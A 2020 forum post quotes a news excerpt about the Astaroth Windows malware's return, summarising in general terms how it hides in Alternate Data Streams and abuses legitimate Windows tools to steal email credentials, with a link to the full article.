03-26-2020 , 10:38 PM
Quote: The notorious Windows malware Astaroth (aptly named after a demon baron of Hell found in occult cosmology) is back at it after several months of inactivity.
Microsoft exposed its tactics last year, but the annoying malware is even harder to catch this time around—thanks to the clever methods it uses to conceal itself among seemingly normal files.
Astaroth’s new tactics include using Alternate Data Stream (ADS) to slip malicious hardware into a downloading file without your browser, operating system, or antimalware software ever noticing.
Astaroth then uses legitimate Windows tools—such as ExtExport.exe, NirSoft MailPassView, BITSAdmin, and others—to execute its attacks.
It can use these tools to steal your email login credentials, send system information, and open your PC up to other forms of attack that can be extremely dangerous, but since these are legit tools, it will be hard—potentially impossible—for normal anti-virus software to block them.
Continue reading here:
https://lifehacker.com/how-to-avoid-the-...1842509944